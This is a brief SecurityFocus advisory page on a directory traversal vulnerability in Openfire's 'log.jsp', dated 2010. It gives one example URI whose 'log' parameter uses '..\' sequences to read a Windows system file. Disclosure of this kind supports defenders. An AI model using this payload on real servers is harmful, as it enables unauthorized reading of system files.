info
discussion
exploit
solution
references
Openfire 'log.jsp' Directory Traversal Vulnerability
An attacker can exploit this issue with a browser.
The following example URI is available:
http://www.example.com/log.jsp?log=..\..\..\windows\debug\netsetup
Privacy Statement
Copyright 2010, SecurityFocus
